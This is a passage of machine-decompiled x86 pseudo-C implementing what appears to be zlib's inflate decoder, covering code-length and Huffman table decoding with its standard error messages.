                                                                                                                                                                                        											if( *(__ebx + 0x64) > 0x1e) {
                                                                                                                                                                                        												goto L183;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											L182:
                                                                                                                                                                                        											 *(__ebx + 0x68) =  *(__ebx + 0x68) & 0x00000000;
                                                                                                                                                                                        											_push(0x11);
                                                                                                                                                                                        											_pop(__eax);
                                                                                                                                                                                        											 *__ebx = __eax;
                                                                                                                                                                                        											goto L189;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										L177:
                                                                                                                                                                                        										__eax =  *(__ebp - 8);
                                                                                                                                                                                        										while(1) {
                                                                                                                                                                                        											L178:
                                                                                                                                                                                        											__eflags = __ecx;
                                                                                                                                                                                        											if(__ecx == 0) {
                                                                                                                                                                                        												goto L322;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											L179:
                                                                                                                                                                                        											__eax =  *__eax & 0x000000ff;
                                                                                                                                                                                        											 *(__ebp - 4) = __ecx;
                                                                                                                                                                                        											__ecx = __edi;
                                                                                                                                                                                        											__eax = __eax << __cl;
                                                                                                                                                                                        											__edi = __edi + 8;
                                                                                                                                                                                        											__ecx =  *(__ebp - 4);
                                                                                                                                                                                        											__edx = __eax + __edx;
                                                                                                                                                                                        											__eax =  *(__ebp - 8);
                                                                                                                                                                                        											__eax =  *(__ebp - 8) + 1;
                                                                                                                                                                                        											 *(__ebp - 0xc) = __edx;
                                                                                                                                                                                        											 *(__ebp - 8) = __eax;
                                                                                                                                                                                        											__eflags = __edi - 0xe;
                                                                                                                                                                                        											if(__edi < 0xe) {
                                                                                                                                                                                        												continue;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											goto L180;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										goto L322;
                                                                                                                                                                                        									case 0x11:
                                                                                                                                                                                        										while(1) {
                                                                                                                                                                                        											L189:
                                                                                                                                                                                        											__eax =  *(__ebx + 0x68);
                                                                                                                                                                                        											__eflags =  *(__ebx + 0x68) -  *(__ebx + 0x5c);
                                                                                                                                                                                        											if( *(__ebx + 0x68) >=  *(__ebx + 0x5c)) {
                                                                                                                                                                                        												break;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											L184:
                                                                                                                                                                                        											__eflags = __edi - 3;
                                                                                                                                                                                        											if(__edi >= 3) {
                                                                                                                                                                                        												L188:
                                                                                                                                                                                        												__eax =  *(__ebx + 0x68);
                                                                                                                                                                                        												__edx = __edx & 0x00000007;
                                                                                                                                                                                        												__edx = __edx >> 3;
                                                                                                                                                                                        												 *(__ebp - 0xc) = __edx;
                                                                                                                                                                                        												__eax =  *(0x1324908 +  *(__ebx + 0x68) * 2) & 0x0000ffff;
                                                                                                                                                                                        												 *((short*)(__ebx + 0x70 + ( *(0x1324908 +  *(__ebx + 0x68) * 2) & 0x0000ffff) * 2)) = __cx;
                                                                                                                                                                                        												 *(__ebx + 0x68) =  *(__ebx + 0x68) + 1;
                                                                                                                                                                                        												__edi = __edi - 3;
                                                                                                                                                                                        												__eflags = __edi;
                                                                                                                                                                                        												__ecx =  *(__ebp - 4);
                                                                                                                                                                                        												 *(__ebp - 0x10) = __edi;
                                                                                                                                                                                        												continue;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											L185:
                                                                                                                                                                                        											__eax =  *(__ebp - 8);
                                                                                                                                                                                        											while(1) {
                                                                                                                                                                                        												L186:
                                                                                                                                                                                        												__eflags = __ecx;
                                                                                                                                                                                        												if(__ecx == 0) {
                                                                                                                                                                                        													goto L322;
                                                                                                                                                                                        												}
                                                                                                                                                                                        												L187:
                                                                                                                                                                                        												__eax =  *__eax & 0x000000ff;
                                                                                                                                                                                        												 *(__ebp - 4) = __ecx;
                                                                                                                                                                                        												__ecx = __edi;
                                                                                                                                                                                        												__eax = __eax << __cl;
                                                                                                                                                                                        												__edi = __edi + 8;
                                                                                                                                                                                        												__ecx =  *(__ebp - 4);
                                                                                                                                                                                        												__edx = __eax + __edx;
                                                                                                                                                                                        												__eax =  *(__ebp - 8);
                                                                                                                                                                                        												__eax =  *(__ebp - 8) + 1;
                                                                                                                                                                                        												 *(__ebp - 0xc) = __edx;
                                                                                                                                                                                        												 *(__ebp - 8) = __eax;
                                                                                                                                                                                        												__eflags = __edi - 3;
                                                                                                                                                                                        												if(__edi < 3) {
                                                                                                                                                                                        													continue;
                                                                                                                                                                                        												}
                                                                                                                                                                                        												goto L188;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											goto L322;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										L190:
                                                                                                                                                                                        										while(1) {
                                                                                                                                                                                        											L192:
                                                                                                                                                                                        											__eflags =  *(__ebx + 0x68) - 0x13;
                                                                                                                                                                                        											if( *(__ebx + 0x68) >= 0x13) {
                                                                                                                                                                                        												break;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											L191:
                                                                                                                                                                                        											__eax =  *(__ebx + 0x68);
                                                                                                                                                                                        											__ecx = 0;
                                                                                                                                                                                        											__eax =  *(0x1324908 +  *(__ebx + 0x68) * 2) & 0x0000ffff;
                                                                                                                                                                                        											 *((short*)(__ebx + 0x70 + ( *(0x1324908 +  *(__ebx + 0x68) * 2) & 0x0000ffff) * 2)) = __cx;
                                                                                                                                                                                        											_t368 = __ebx + 0x68;
                                                                                                                                                                                        											 *_t368 =  *(__ebx + 0x68) + 1;
                                                                                                                                                                                        											__eflags =  *_t368;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										L193:
                                                                                                                                                                                        										__eax = __ebx + 0x530;
                                                                                                                                                                                        										__ecx = __ebx + 0x6c;
                                                                                                                                                                                        										 *(__ebx + 0x4c) = __eax;
                                                                                                                                                                                        										 *(__ebx + 0x6c) = __eax;
                                                                                                                                                                                        										__edx = __ebx + 0x54;
                                                                                                                                                                                        										__eax = __ebx + 0x2f0;
                                                                                                                                                                                        										 *(__ebx + 0x54) = 7;
                                                                                                                                                                                        										__eax = __ebx + 0x70;
                                                                                                                                                                                        										__eax = E013233B4(0, __ebx + 0x70, 0x13, __ecx, __edx, __ebx + 0x2f0);
                                                                                                                                                                                        										 *(__ebp - 0x20) = __eax;
                                                                                                                                                                                        										__eflags = __eax;
                                                                                                                                                                                        										if(__eax == 0) {
                                                                                                                                                                                        											L196:
                                                                                                                                                                                        											 *(__ebx + 0x68) =  *(__ebx + 0x68) & 0x00000000;
                                                                                                                                                                                        											 *__ebx = 0x12;
                                                                                                                                                                                        											goto L224;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										L194:
                                                                                                                                                                                        										 *(__esi + 0x18) = "invalid code lengths set";
                                                                                                                                                                                        										goto L195;
                                                                                                                                                                                        									case 0x12:
                                                                                                                                                                                        										while(1) {
                                                                                                                                                                                        											L224:
                                                                                                                                                                                        											 *(__ebx + 0x64) =  *(__ebx + 0x64) +  *(__ebx + 0x60);
                                                                                                                                                                                        											__ecx =  *(__ebx + 0x68);
                                                                                                                                                                                        											 *(__ebp - 0x2c) = __ecx;
                                                                                                                                                                                        											__eflags = __ecx -  *(__ebx + 0x64) +  *(__ebx + 0x60);
                                                                                                                                                                                        											if(__ecx <  *(__ebx + 0x64) +  *(__ebx + 0x60)) {
                                                                                                                                                                                        												goto L199;
                                                                                                                                                                                        											} else {
                                                                                                                                                                                        												break;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											while(1) {
                                                                                                                                                                                        												L199:
                                                                                                                                                                                        												__ecx =  *(__ebx + 0x54);
                                                                                                                                                                                        												__edx = 0;
                                                                                                                                                                                        												__eax =  *(__ebx + 0x4c);
                                                                                                                                                                                        												1 = 1 << __cl;
                                                                                                                                                                                        												__edx = (1 << __cl) - 1;
                                                                                                                                                                                        												__edx = (1 << __cl) - 0x00000001 &  *(__ebp - 0xc);
                                                                                                                                                                                        												__eax =  *( *(__ebx + 0x4c) + ((1 << __cl) - 0x00000001 &  *(__ebp - 0xc)) * 4);
                                                                                                                                                                                        												__eax = __eax >> 8;
                                                                                                                                                                                        												__ecx = __cl & 0x000000ff;
                                                                                                                                                                                        												 *(__ebp - 0x34) = __eax;
                                                                                                                                                                                        												__eflags = (__cl & 0x000000ff) - __edi;
                                                                                                                                                                                        												if((__cl & 0x000000ff) <= __edi) {
                                                                                                                                                                                        													break;
                                                                                                                                                                                        												}
                                                                                                                                                                                        												L197:
                                                                                                                                                                                        												__ecx =  *(__ebp - 4);
                                                                                                                                                                                        												__eflags = __ecx;
                                                                                                                                                                                        												if(__ecx == 0) {
                                                                                                                                                                                        													goto L323;
                                                                                                                                                                                        												}
                                                                                                                                                                                        												L198:
                                                                                                                                                                                        												__edx =  *(__ebp - 8);
                                                                                                                                                                                        												 *(__ebp - 4) = __ecx;
                                                                                                                                                                                        												__ecx = __edi;
                                                                                                                                                                                        												 *__edx & 0x000000ff = ( *__edx & 0x000000ff) << __cl;
                                                                                                                                                                                        												 *(__ebp - 0xc) =  *(__ebp - 0xc) + (( *__edx & 0x000000ff) << __cl);
                                                                                                                                                                                        												 *(__ebp - 8) = __edx;
                                                                                                                                                                                        												__edi = __edi + 8;
                                                                                                                                                                                        												__eflags = __edi;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											L200:
                                                                                                                                                                                        											__edx = __eax;
                                                                                                                                                                                        											_push(0x10);
                                                                                                                                                                                        											__edx = __eax >> 0x10;
                                                                                                                                                                                        											_pop(__ecx);
                                                                                                                                                                                        											__eflags = __dx - __cx;
                                                                                                                                                                                        											if(__eflags >= 0) {
                                                                                                                                                                                        												L202:
                                                                                                                                                                                        												if(__eflags != 0) {
                                                                                                                                                                                        													L208:
                                                                                                                                                                                        													__edx =  *(__ebp - 0xc);
                                                                                                                                                                                        													_push(0x11);
                                                                                                                                                                                        													_pop(__ecx);
                                                                                                                                                                                        													__eflags =  *(__ebp - 0x32) - __cx;
                                                                                                                                                                                        													__ecx = __ah & 0x000000ff;
                                                                                                                                                                                        													if( *(__ebp - 0x32) != __cx) {
                                                                                                                                                                                        														L214:
                                                                                                                                                                                        														 *(__ebp - 0x10) = __ecx;
                                                                                                                                                                                        														while(1) {
                                                                                                                                                                                        															L215:
                                                                                                                                                                                        															_t432 = __ecx + 7; // 0x18
                                                                                                                                                                                        															__eax = _t432;
                                                                                                                                                                                        															__eflags = __edi - _t432;
                                                                                                                                                                                        															if(__edi >= _t432) {
                                                                                                                                                                                        																break;
                                                                                                                                                                                        															}
                                                                                                                                                                                        															L216:
                                                                                                                                                                                        															__ecx =  *(__ebp - 4);
                                                                                                                                                                                        															__eflags = __ecx;
                                                                                                                                                                                        															if(__ecx == 0) {
                                                                                                                                                                                        																goto L323;
                                                                                                                                                                                        															}
                                                                                                                                                                                        															L217:
                                                                                                                                                                                        															__eax =  *(__ebp - 8);
                                                                                                                                                                                        															 *(__ebp - 4) = __ecx;
                                                                                                                                                                                        															__ecx = __edi;
                                                                                                                                                                                        															 *( *(__ebp - 8)) & 0x000000ff = ( *( *(__ebp - 8)) & 0x000000ff) << __cl;
                                                                                                                                                                                        															__ecx =  *(__ebp - 0x10);
                                                                                                                                                                                        															__edx = __edx + (( *( *(__ebp - 8)) & 0x000000ff) << __cl);
                                                                                                                                                                                        															 *(__ebp - 8) =  *(__ebp - 8) + 1;
                                                                                                                                                                                        															__edi = __edi + 8;
                                                                                                                                                                                        															 *(__ebp - 0xc) = __edx;
                                                                                                                                                                                        														}
                                                                                                                                                                                        														L218:
                                                                                                                                                                                        														__edx = __edx >> __cl;
                                                                                                                                                                                        														__ecx = __edx;
                                                                                                                                                                                        														__edx = __edx >> 7;
                                                                                                                                                                                        														__ecx = __ecx & 0x0000007f;
                                                                                                                                                                                        														_push(0xfffffff9);
                                                                                                                                                                                        														_pop(__eax);
                                                                                                                                                                                        														__ecx = __ecx + 0xb;
                                                                                                                                                                                        														__eax = __eax -  *(__ebp - 0x10);
                                                                                                                                                                                        														__eflags = __eax;
                                                                                                                                                                                        														L219:
                                                                                                                                                                                        														 *(__ebp - 0x34) =  *(__ebp - 0x34) & 0x00000000;
                                                                                                                                                                                        														__edi = __edi + __eax;
                                                                                                                                                                                        														__eflags = __edi;
                                                                                                                                                                                        														L220:
                                                                                                                                                                                        														 *(__ebx + 0x64) =  *(__ebx + 0x64) +  *(__ebx + 0x60);
                                                                                                                                                                                        														 *(__ebp - 0x30) = __ecx;
                                                                                                                                                                                        														__ecx = __ecx +  *(__ebp - 0x2c);
                                                                                                                                                                                        														 *(__ebp - 0xc) = __edx;
                                                                                                                                                                                        														 *(__ebp - 0x10) = __edi;
                                                                                                                                                                                        														__eflags = __ecx -  *(__ebx + 0x64) +  *(__ebx + 0x60);
                                                                                                                                                                                        														if(__ecx >  *(__ebx + 0x64) +  *(__ebx + 0x60)) {
                                                                                                                                                                                        															L227:
                                                                                                                                                                                        															 *(__esi + 0x18) = "invalid bit length repeat";
                                                                                                                                                                                        															 *__ebx = 0x1d;
                                                                                                                                                                                        															L228:
                                                                                                                                                                                        															__eflags =  *__ebx - 0x1d;
                                                                                                                                                                                        															if( *__ebx == 0x1d) {
                                                                                                                                                                                        																L133:
                                                                                                                                                                                        																__edx =  *(__ebp - 0xc);
                                                                                                                                                                                        																goto L134;
                                                                                                                                                                                        															}
                                                                                                                                                                                        															L229:
                                                                                                                                                                                        															__eax = 0;
                                                                                                                                                                                        															__eflags =  *((intOrPtr*)(__ebx + 0x270)) - __ax;
                                                                                                                                                                                        															if( *((intOrPtr*)(__ebx + 0x270)) != __ax) {
                                                                                                                                                                                        																L231:
                                                                                                                                                                                        																__eax = __ebx + 0x530;
                                                                                                                                                                                        																__ecx = __ebx + 0x6c;
                                                                                                                                                                                        																 *(__ebx + 0x4c) = __eax;
                                                                                                                                                                                        																 *(__ebx + 0x6c) = __eax;
                                                                                                                                                                                        																__edx = __ebx + 0x54;
                                                                                                                                                                                        																__eax = __ebx + 0x2f0;
                                                                                                                                                                                        																 *(__ebx + 0x54) = 9;
                                                                                                                                                                                        																__eax = __ebx + 0x70;
                                                                                                                                                                                        																__eax = E013233B4(1, __ebx + 0x70,  *(__ebx + 0x60), __ecx, __edx, __ebx + 0x2f0);
                                                                                                                                                                                        																 *(__ebp - 0x20) = __eax;
                                                                                                                                                                                        																__eflags = __eax;
                                                                                                                                                                                        																if(__eax == 0) {
                                                                                                                                                                                        																	L233:
                                                                                                                                                                                        																	__ecx = __ebx + 0x6c;
                                                                                                                                                                                        																	__eax =  *__ecx;
                                                                                                                                                                                        																	__edx = __ebx + 0x58;
                                                                                                                                                                                        																	 *(__ebx + 0x50) =  *__ecx;
                                                                                                                                                                                        																	__ebx + 0x2f0 =  *(__ebx + 0x60);
                                                                                                                                                                                        																	__eax =  *(__ebx + 0x60) + 0x38;
                                                                                                                                                                                        																	 *(__ebx + 0x58) = 6;
                                                                                                                                                                                        																	__eax = __ebx + ( *(__ebx + 0x60) + 0x38) * 2;
                                                                                                                                                                                        																	__eax = E013233B4(2, __ebx + ( *(__ebx + 0x60) + 0x38) * 2,  *(__ebx + 0x64), __ecx, __edx, __ebx + 0x2f0);
                                                                                                                                                                                        																	 *(__ebp - 0x20) = __eax;
                                                                                                                                                                                        																	__eflags = __eax;
                                                                                                                                                                                        																	if(__eax == 0) {
                                                                                                                                                                                        																		L235:
                                                                                                                                                                                        																		__eflags =  *((intOrPtr*)(__ebp + 0xc)) - 6;
                                                                                                                                                                                        																		__ecx =  *(__ebp - 4);
                                                                                                                                                                                        																		 *__ebx = 0x13;
                                                                                                                                                                                        																		if( *((intOrPtr*)(__ebp + 0xc)) == 6) {
                                                                                                                                                                                        																			goto L323;
                                                                                                                                                                                        																		}
                                                                                                                                                                                        																		L236:
                                                                                                                                                                                        																		__edx =  *(__ebp - 0xc);
                                                                                                                                                                                        																		goto L237;
                                                                                                                                                                                        																	}
                                                                                                                                                                                        																	L234:
                                                                                                                                                                                        																	 *(__esi + 0x18) = "invalid distances set";
                                                                                                                                                                                        																	L195:
                                                                                                                                                                                        																	 *__ebx = 0x1d;
                                                                                                                                                                                        																	goto L133;
                                                                                                                                                                                        																}
                                                                                                                                                                                        																L232:
                                                                                                                                                                                        																 *(__esi + 0x18) = "invalid literal/lengths set";
                                                                                                                                                                                        																goto L195;
                                                                                                                                                                                        															}
                                                                                                                                                                                        															L230:
                                                                                                                                                                                        															 *(__esi + 0x18) = "invalid code -- missing end-of-block";
                                                                                                                                                                                        															goto L195;
                                                                                                                                                                                        														}
                                                                                                                                                                                        														L221:
                                                                                                                                                                                        														__ecx =  *(__ebp - 0x30);
                                                                                                                                                                                        														__eflags = __ecx;
                                                                                                                                                                                        														if(__ecx == 0) {
                                                                                                                                                                                        															continue;
                                                                                                                                                                                        														}
                                                                                                                                                                                        														L222:
                                                                                                                                                                                        														__edx =  *(__ebp - 0x34);
                                                                                                                                                                                        														do {
                                                                                                                                                                                        															L223:
                                                                                                                                                                                        															__eax =  *(__ebx + 0x68);
                                                                                                                                                                                        															 *((short*)(__ebx + 0x70 +  *(__ebx + 0x68) * 2)) = __dx;
                                                                                                                                                                                        															 *(__ebx + 0x68) =  *(__ebx + 0x68) + 1;
                                                                                                                                                                                        															__ecx = __ecx - 1;
                                                                                                                                                                                        															__eflags = __ecx;
                                                                                                                                                                                        														} while (__ecx != 0);
                                                                                                                                                                                        														continue;
                                                                                                                                                                                        													}
                                                                                                                                                                                        													L209:
                                                                                                                                                                                        													 *(__ebp - 0x10) = __ecx;
                                                                                                                                                                                        													while(1) {
                                                                                                                                                                                        														L210:
                                                                                                                                                                                        														_t422 = __ecx + 3; // 0x14
                                                                                                                                                                                        														__eax = _t422;
                                                                                                                                                                                        														__eflags = __edi - _t422;
                                                                                                                                                                                        														if(__edi >= _t422) {
                                                                                                                                                                                        															break;
                                                                                                                                                                                        														}
                                                                                                                                                                                        														L211:
                                                                                                                                                                                        														__ecx =  *(__ebp - 4);
                                                                                                                                                                                        														__eflags = __ecx;
                                                                                                                                                                                        														if(__ecx == 0) {
                                                                                                                                                                                        															goto L323;
                                                                                                                                                                                        														}
                                                                                                                                                                                        														L212:
                                                                                                                                                                                        														__eax =  *(__ebp - 8);
                                                                                                                                                                                        														 *(__ebp - 4) = __ecx;
                                                                                                                                                                                        														__ecx = __edi;
                                                                                                                                                                                        														 *( *(__ebp - 8)) & 0x000000ff = ( *( *(__ebp - 8)) & 0x000000ff) << __cl;
                                                                                                                                                                                        														__ecx =  *(__ebp - 0x10);
                                                                                                                                                                                        														__edx = __edx + (( *( *(__ebp - 8)) & 0x000000ff) << __cl);
                                                                                                                                                                                        														 *(__ebp - 8) =  *(__ebp - 8) + 1;
                                                                                                                                                                                        														__edi = __edi + 8;
                                                                                                                                                                                        														 *(__ebp - 0xc) = __edx;
                                                                                                                                                                                        													}
                                                                                                                                                                                        													L213:
                                                                                                                                                                                        													__edx = __edx >> __cl;
                                                                                                                                                                                        													__ecx = __edx;
                                                                                                                                                                                        													__edx = __edx >> 3;
                                                                                                                                                                                        													__ecx = __ecx & 0x00000007;
                                                                                                                                                                                        													_push(0xfffffffd);
                                                                                                                                                                                        													_pop(__eax);
                                                                                                                                                                                        													__ecx = __ecx + 3;
                                                                                                                                                                                        													__eax = __eax -  *(__ebp - 0x10);
                                                                                                                                                                                        													goto L219;
                                                                                                                                                                                        												}
                                                                                                                                                                                        												L203:
                                                                                                                                                                                        												__eax = __eax >> 8;
                                                                                                                                                                                        												__ecx = __cl & 0x000000ff;
                                                                                                                                                                                        												__ecx = (__cl & 0x000000ff) + 2;
                                                                                                                                                                                        												 *(__ebp - 0x34) = __ecx;
                                                                                                                                                                                        												__eflags = __edi - __ecx;
                                                                                                                                                                                        												if(__edi >= __ecx) {
                                                                                                                                                                                        													L206:
                                                                                                                                                                                        													__edx =  *(__ebp - 0xc);
                                                                                                                                                                                        													__ecx = __ah & 0x000000ff;
                                                                                                                                                                                        													__eax =  *(__ebp - 0x2c);
                                                                                                                                                                                        													__edi = __edi - __ecx;
                                                                                                                                                                                        													__edx =  *(__ebp - 0xc) >> __cl;
                                                                                                                                                                                        													 *(__ebp - 0xc) = __edx;
                                                                                                                                                                                        													 *(__ebp - 0x10) = __edi;
                                                                                                                                                                                        													__eflags = __eax;
                                                                                                                                                                                        													if(__eax == 0) {
                                                                                                                                                                                        														L226:
                                                                                                                                                                                        														 *(__esi + 0x18) = "invalid bit length repeat";
                                                                                                                                                                                        														goto L17;
                                                                                                                                                                                        													}
                                                                                                                                                                                        													L207:
                                                                                                                                                                                        													__eax =  *(__ebx + 0x6e + __eax * 2) & 0x0000ffff;
                                                                                                                                                                                        													__ecx = __edx;
                                                                                                                                                                                        													__ecx = __edx & 0x00000003;
                                                                                                                                                                                        													__edx = __edx >> 2;
                                                                                                                                                                                        													__ecx = __ecx + 3;
                                                                                                                                                                                        													 *(__ebp - 0x34) = __eax;
                                                                                                                                                                                        													__edi = __edi - 2;
                                                                                                                                                                                        													goto L220;
                                                                                                                                                                                        												} else {
                                                                                                                                                                                        													goto L204;
                                                                                                                                                                                        												}
                                                                                                                                                                                        												while(1) {
                                                                                                                                                                                        													L204:
                                                                                                                                                                                        													__ecx =  *(__ebp - 4);
                                                                                                                                                                                        													__eflags = __ecx;
                                                                                                                                                                                        													if(__ecx == 0) {
                                                                                                                                                                                        														goto L323;
                                                                                                                                                                                        													}
                                                                                                                                                                                        													L205:
                                                                                                                                                                                        													 *(__ebp - 4) = __ecx;
                                                                                                                                                                                        													__ecx =  *(__ebp - 8);
                                                                                                                                                                                        													__edx =  *( *(__ebp - 8)) & 0x000000ff;
                                                                                                                                                                                        													__ecx = __edi;
                                                                                                                                                                                        													__edx = ( *( *(__ebp - 8)) & 0x000000ff) << __cl;
                                                                                                                                                                                        													__edi = __edi + 8;
                                                                                                                                                                                        													 *(__ebp - 0xc) =  *(__ebp - 0xc) + (( *( *(__ebp - 8)) & 0x000000ff) << __cl);
                                                                                                                                                                                        													 *(__ebp - 8) =  *(__ebp - 8) + 1;
                                                                                                                                                                                        													__eflags = __edi -  *(__ebp - 0x34);
                                                                                                                                                                                        													if(__edi <  *(__ebp - 0x34)) {
                                                                                                                                                                                        														continue;
                                                                                                                                                                                        													}
                                                                                                                                                                                        													goto L206;
                                                                                                                                                                                        												}
                                                                                                                                                                                        												goto L323;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											L201:
                                                                                                                                                                                        											__eax = __eax >> 8;
                                                                                                                                                                                        											__ecx = __al & 0x000000ff;
                                                                                                                                                                                        											__eax =  *(__ebp - 0x2c);
                                                                                                                                                                                        											__edi = __edi - (__al & 0x000000ff);
                                                                                                                                                                                        											 *(__ebp - 0xc) =  *(__ebp - 0xc) >> __cl;
                                                                                                                                                                                        											 *(__ebp - 0x10) = __edi;
                                                                                                                                                                                        											 *((short*)(__ebx + 0x70 +  *(__ebp - 0x2c) * 2)) = __dx;
                                                                                                                                                                                        											 *(__ebx + 0x68) =  *(__ebx + 0x68) + 1;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										L225:
                                                                                                                                                                                        										goto L228;
                                                                                                                                                                                        									case 0x13:
                                                                                                                                                                                        										L237:
                                                                                                                                                                                        										 *__ebx = 0x14;
                                                                                                                                                                                        										goto L238;
                                                                                                                                                                                        									case 0x14:
                                                                                                                                                                                        										L238:
                                                                                                                                                                                        										__eflags = __ecx - 6;
                                                                                                                                                                                        										if(__ecx < 6) {
                                                                                                                                                                                        											L242:
                                                                                                                                                                                        											__eax =  *(__ebx + 0x4c);
                                                                                                                                                                                        											__ecx =  *(__ebx + 0x54);
                                                                                                                                                                                        											 *(__ebx + 0x1bc4) =  *(__ebx + 0x1bc4) & 0x00000000;
                                                                                                                                                                                        											 *(__ebp - 0x30) =  *(__ebx + 0x4c);
                                                                                                                                                                                        											0 = 1;
                                                                                                                                                                                        											__eax = 1 << __cl;
                                                                                                                                                                                        											__ecx =  *(__ebx + 0x4c);
                                                                                                                                                                                        											__eax = (1 << __cl) - 1;
                                                                                                                                                                                        											__eax = (1 << __cl) - 0x00000001 & __edx;
                                                                                                                                                                                        											__eax =  *( *(__ebx + 0x4c) + ((1 << __cl) - 0x00000001 & __edx) * 4);
                                                                                                                                                                                        											while(1) {
                                                                                                                                                                                        												L245:
                                                                                                                                                                                        												__eax = __eax >> 8;
                                                                                                                                                                                        												__ecx = __cl & 0x000000ff;
                                                                                                                                                                                        												__eflags = (__cl & 0x000000ff) - __edi;
                                                                                                                                                                                        												if((__cl & 0x000000ff) <= __edi) {
                                                                                                                                                                                        													break;
                                                                                                                                                                                        												}
                                                                                                                                                                                        												L243:
                                                                                                                                                                                        												__ecx =  *(__ebp - 4);
                                                                                                                                                                                        												__eflags = __ecx;
                                                                                                                                                                                        												if(__ecx == 0) {
                                                                                                                                                                                        													goto L323;
                                                                                                                                                                                        												}
                                                                                                                                                                                        												L244:
                                                                                                                                                                                        												__eax =  *(__ebp - 8);
                                                                                                                                                                                        												 *(__ebp - 4) = __ecx;
                                                                                                                                                                                        												__ecx = __edi;
                                                                                                                                                                                        												__edi = __edi + 8;
                                                                                                                                                                                        												 *(__ebp - 0x10) = __edi;
                                                                                                                                                                                        												 *( *(__ebp - 8)) & 0x000000ff = ( *( *(__ebp - 8)) & 0x000000ff) << __cl;
                                                                                                                                                                                        												__ecx =  *(__ebx + 0x54);
                                                                                                                                                                                        												__edx = __edx + (( *( *(__ebp - 8)) & 0x000000ff) << __cl);
                                                                                                                                                                                        												 *(__ebp - 8) =  *(__ebp - 8) + 1;
                                                                                                                                                                                        												__eax =  *(__ebx + 0x4c);
                                                                                                                                                                                        												 *(__ebp - 0xc) = __edx;
                                                                                                                                                                                        												0 = 1;
                                                                                                                                                                                        												1 << __cl = (1 << __cl) - 1;
                                                                                                                                                                                        												__edx = (1 << __cl) - 0x00000001 &  *(__ebp - 0xc);
                                                                                                                                                                                        												__eflags = 1;
                                                                                                                                                                                        												__eax =  *( *(__ebx + 0x4c) + ((1 << __cl) - 0x00000001 &  *(__ebp - 0xc)) * 4);
                                                                                                                                                                                        												__edx =  *(__ebp - 0xc);
                                                                                                                                                                                        											}
                                                                                                                                                                                        											L246:
                                                                                                                                                                                        											__eflags = __al;
                                                                                                                                                                                        											if(__al == 0) {
                                                                                                                                                                                        												L252:
                                                                                                                                                                                        												__eax = __eax >> 8;
                                                                                                                                                                                        												__ecx = __cl & 0x000000ff;
                                                                                                                                                                                        												 *(__ebx + 0x1bc4) =  *(__ebx + 0x1bc4) + __ecx;
                                                                                                                                                                                        												__edi = __edi - __ecx;
                                                                                                                                                                                        												__edx = __edx >> __cl;
                                                                                                                                                                                        												__ecx = __eax;
                                                                                                                                                                                        												__ecx = __eax >> 0x10;
                                                                                                                                                                                        												 *(__ebp - 0xc) = __edx;
                                                                                                                                                                                        												 *(__ebp - 0x10) = __edi;
                                                                                                                                                                                        												 *(__ebx + 0x40) = __ecx;
                                                                                                                                                                                        												__eflags = __al;
                                                                                                                                                                                        												if(__al != 0) {
                                                                                                                                                                                        													L254:
                                                                                                                                                                                        													__eflags = __al & 0x00000020;
                                                                                                                                                                                        													if((__al & 0x00000020) == 0) {
                                                                                                                                                                                        														L256:
                                                                                                                                                                                        														__ecx =  *(__ebp - 4);
                                                                                                                                                                                        														__eflags = __al & 0x00000040;
                                                                                                                                                                                        														if((__al & 0x00000040) == 0) {
                                                                                                                                                                                        															L258:
                                                                                                                                                                                        															__eax = __al & 0x000000ff;
                                                                                                                                                                                        															__eax = __al & 0xf;
                                                                                                                                                                                        															__eflags = __eax;
                                                                                                                                                                                        															 *__ebx = 0x15;
                                                                                                                                                                                        															 *(__ebx + 0x48) = __eax;
                                                                                                                                                                                        															goto L259;
                                                                                                                                                                                        														}
                                                                                                                                                                                        														L257:
                                                                                                                                                                                        														 *(__esi + 0x18) = "invalid literal/length code";
                                                                                                                                                                                        														L31:
                                                                                                                                                                                        														 *__ebx = 0x1d;
                                                                                                                                                                                        														goto L135;
                                                                                                                                                                                        													}
                                                                                                                                                                                        													L255:
                                                                                                                                                                                        													 *(__ebx + 0x1bc4) =  *(__ebx + 0x1bc4) | 0xffffffff;
                                                                                                                                                                                        													 *__ebx = 0xb;
                                                                                                                                                                                        													goto L134;
                                                                                                                                                                                        												}
                                                                                                                                                                                        												L253:
                                                                                                                                                                                        												 *__ebx = 0x19;
                                                                                                                                                                                        												goto L134;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											L247:
                                                                                                                                                                                        											__eflags = __al & 0x000000f0;
                                                                                                                                                                                        											if((__al & 0x000000f0) != 0) {
                                                                                                                                                                                        												goto L252;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											L248:
                                                                                                                                                                                        											__edi = 0;
                                                                                                                                                                                        											__ecx = __al & 0x000000ff;
                                                                                                                                                                                        											__ebx = __eax;
                                                                                                                                                                                        											__edi = 1;
                                                                                                                                                                                        											__ebx = __eax >> 8;
                                                                                                                                                                                        											__edx = __eax;
                                                                                                                                                                                        											__esi = __bl & 0x000000ff;
                                                                                                                                                                                        											__ecx = (__al & 0x000000ff) + __esi;
                                                                                                                                                                                        											__eax = __eax >> 0x10;
                                                                                                                                                                                        											__edi = 1 << __cl;
                                                                                                                                                                                        											__ecx = __esi;
                                                                                                                                                                                        											__edi = (1 << __cl) - 1;
                                                                                                                                                                                        											 *(__ebp - 0x34) = __edx;
                                                                                                                                                                                        											(1 << __cl) - 0x00000001 &  *(__ebp - 0xc) = ((1 << __cl) - 0x00000001 &  *(__ebp - 0xc)) >> __cl;
                                                                                                                                                                                        											__ecx =  *(__ebp - 0x30);
                                                                                                                                                                                        											__edi = __eax + (((1 << __cl) - 0x00000001 &  *(__ebp - 0xc)) >> __cl);
                                                                                                                                                                                        											__eax =  *( *(__ebp - 0x30) + (__eax + (((1 << __cl) - 0x00000001 &  *(__ebp - 0xc)) >> __cl)) * 4);
